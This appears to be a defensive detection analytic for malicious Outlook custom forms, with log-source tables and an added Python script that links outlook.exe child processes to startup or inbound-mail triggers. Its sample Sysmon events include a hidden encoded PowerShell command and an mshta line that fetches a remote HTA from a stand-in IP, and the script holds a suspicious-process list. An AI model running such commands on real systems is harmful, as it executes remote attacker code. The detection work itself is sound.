An adversary uses a tool such as Ruler to insert a malicious custom form into the user's Outlook mailbox, registering it under a custom message class so that Outlook loads it in place of a standard form. The form's embedded script executes when Outlook starts or when a specially crafted trigger email arrives. The observable result is child processes launched from outlook.exe, typically followed by network connections or payload loading.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Module Load (DC0016) | WinEventLog:Sysmon | EventCode=7 |
| Application Log Content (DC0038) | WinEventLog:Application | Outlook errors loading or processing custom form templates |
| Command Execution (DC0064) | WinEventLog:PowerShell | Execution of Microsoft's script for enumerating custom forms in Outlook mailboxes |
| Field | Description |
|---|---|
| FormStorageLocation | Malicious forms may be registered in different user-specific locations within the mailbox and under a custom message class derived from IPM.Note (e.g., IPM.Note.Custom rather than the default IPM.Note) |
| ChildProcessName | The child process spawned by outlook.exe may vary (e.g., powershell.exe, rundll32.exe, mshta.exe) |
| TimeWindow | Form-triggered execution may happen immediately upon Outlook startup or with delay after crafted message arrival |
| OutlookVersion | Form behavior and error logs may vary across Outlook 2013, 2016, and M365 builds |
| UserContext | Attack may target only specific users; contextual correlation needed for account baselining |
Execution of an Outlook form on message receipt or client launch results in automated code execution within the user's session. Malicious form definitions deviate from the standard templates: they include script logic or COM object calls embedded in form fields.
| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | m365:unified | Unusual form activity within the Outlook client, including loading of non-default forms |
| Command Execution (DC0064) | m365:messagetrace | Inbound email that triggers execution of a mailbox-stored custom form |
| Field | Description |
|---|---|
| AuditPolicyScope | Not all tenants enable audit logging of custom form activity or COM component usage in Office |
| MessageSenderAnomalyThreshold | Ruler-style trigger messages may come from external accounts with forged headers or low sender reputation |
| FormExecutionRate | The frequency of form triggers may be anomalously high compared to baseline Outlook usage for the user |
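The following is an added example, not part of the original analytic, that implements the core of both analytics above: it scans Sysmon EventCode=1 records for suspicious children of outlook.exe (the ChildProcessName element), attributes each hit to the TimeWindow in which it fired (within a short window of an outlook.exe start, or within a window after an inbound message from the m365:messagetrace channel reached that user's mailbox), flags external senders for the MessageSenderAnomalyThreshold check, and counts hits per user for the FormExecutionRate check. The sample events and message-trace rows are constructed for this example; the one-field-per-line rendering, the 60-second startup and 10-minute message windows, the user-to-mailbox mapping, the internal-domain list and the child-process list (which extends the page's three examples with cmd.exe, wscript.exe, cscript.exe, regsvr32.exe and pwsh.exe) are all assumptions to tune for a real environment.

```python
"""Attribute suspicious outlook.exe child processes to a form trigger.

Added example: correlates Sysmon process creation (EventCode=1) with Outlook
startup time and with inbound message trace rows for the same mailbox.
"""
from collections import Counter
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Constructed Sysmon EventCode=1 records rendered one field per line, as a
# Windows event body appears when indexed from WinEventLog:Sysmon. Not real
# telemetry: users, paths, command lines and the IP are invented.
SYSMON_SAMPLE = r"""
EventCode: 1
UtcTime: 2024-05-01 08:00:00.000
User: CORP\alice
Image: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
ParentImage: C:\Windows\explorer.exe
CommandLine: "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"

EventCode: 1
UtcTime: 2024-05-01 08:00:04.500
User: CORP\alice
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentImage: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
CommandLine: powershell.exe -nop -w hidden -enc SQBFAFgA

EventCode: 1
UtcTime: 2024-05-01 09:30:00.000
User: CORP\bob
Image: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
ParentImage: C:\Windows\explorer.exe
CommandLine: "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"

EventCode: 1
UtcTime: 2024-05-01 09:31:00.000
User: CORP\bob
Image: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
ParentImage: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
CommandLine: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n

EventCode: 1
UtcTime: 2024-05-01 10:02:10.000
User: CORP\bob
Image: C:\Windows\System32\mshta.exe
ParentImage: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
CommandLine: mshta.exe http://203.0.113.10/f.hta
"""

# Constructed m365:messagetrace rows (Get-MessageTrace style fields); not real data.
MESSAGE_TRACE_SAMPLE = [
    {"Received": "2024-05-01 07:15:00", "SenderAddress": "hr@corp.example",
     "RecipientAddress": "alice@corp.example", "Status": "Delivered"},
    {"Received": "2024-05-01 10:01:50", "SenderAddress": "invoice@mail-relay.example.net",
     "RecipientAddress": "bob@corp.example", "Status": "Delivered"},
]

# Assumptions for this example: tenant domains, identity mapping, child-process list.
INTERNAL_DOMAINS = {"corp.example"}
MAILBOX_FOR_USER = {r"CORP\alice": "alice@corp.example", r"CORP\bob": "bob@corp.example"}
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe",
                       "mshta.exe", "wscript.exe", "cscript.exe", "regsvr32.exe"}
SYSMON_TS = "%Y-%m-%d %H:%M:%S.%f"
TRACE_TS = "%Y-%m-%d %H:%M:%S"


def parse_sysmon_blocks(text):
    """Split blank-line-separated 'Key: Value' blocks into event dicts."""
    events = []
    for block in text.strip().split("\n\n"):
        ev = {}
        for line in block.splitlines():
            key, _, value = line.partition(": ")   # first ': ' only; paths keep ':\'
            ev[key.strip()] = value.strip()
        ev["time"] = datetime.strptime(ev["UtcTime"], SYSMON_TS)
        events.append(ev)
    return events


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def detect(events, trace, startup_window=timedelta(seconds=60),
           message_window=timedelta(minutes=10)):
    """Return alerts for suspicious outlook.exe children, each with a trigger label."""
    starts = [e for e in events if e.get("EventCode") == "1" and basename(e["Image"]) == "outlook.exe"]
    alerts = []
    for e in events:
        if e.get("EventCode") != "1" or basename(e.get("ParentImage", "")) != "outlook.exe":
            continue
        child = basename(e["Image"])
        if child not in SUSPICIOUS_CHILDREN:
            continue                                # e.g. WINWORD.EXE opening an attachment
        alert = {"user": e["User"], "child": child, "time": e["time"],
                 "cmdline": e.get("CommandLine", ""), "trigger": "unknown",
                 "sender": None, "external_sender": None}
        # Startup trigger: child appears shortly after this user's last outlook.exe start.
        last_start = max((s["time"] for s in starts
                          if s["User"] == e["User"] and s["time"] <= e["time"]), default=None)
        if last_start is not None and e["time"] - last_start <= startup_window:
            alert["trigger"] = "startup"
        else:
            # Message trigger: an inbound message hit this user's mailbox just before the child.
            mailbox = MAILBOX_FOR_USER.get(e["User"])
            for m in trace:
                received = datetime.strptime(m["Received"], TRACE_TS)
                if m["RecipientAddress"] == mailbox and timedelta(0) <= e["time"] - received <= message_window:
                    alert["trigger"] = "message_receipt"
                    alert["sender"] = m["SenderAddress"]
                    alert["external_sender"] = m["SenderAddress"].rsplit("@", 1)[-1] not in INTERNAL_DOMAINS
                    break
        alerts.append(alert)
    return sorted(alerts, key=lambda a: a["time"])


def summarize(alerts):
    """Hits per user, to compare against a per-user baseline (FormExecutionRate)."""
    return dict(Counter(a["user"] for a in alerts))


if __name__ == "__main__":
    for a in detect(parse_sysmon_blocks(SYSMON_SAMPLE), MESSAGE_TRACE_SAMPLE):
        print(a)
    print(summarize(detect(parse_sysmon_blocks(SYSMON_SAMPLE), MESSAGE_TRACE_SAMPLE)))
```

On the sample, alice's powershell.exe fires 4.5 seconds after her outlook.exe start and is labelled a startup trigger; bob's mshta.exe fires 32 minutes after his Outlook start but 20 seconds after an external message was delivered, so it is labelled a message-receipt trigger with the sender attached for reputation review; WINWORD.EXE under outlook.exe is ignored as an expected child. The "unknown" label is deliberate: a hit that matches neither window still deserves triage, since the message may have arrived outside the trace window or the form may run on a delay.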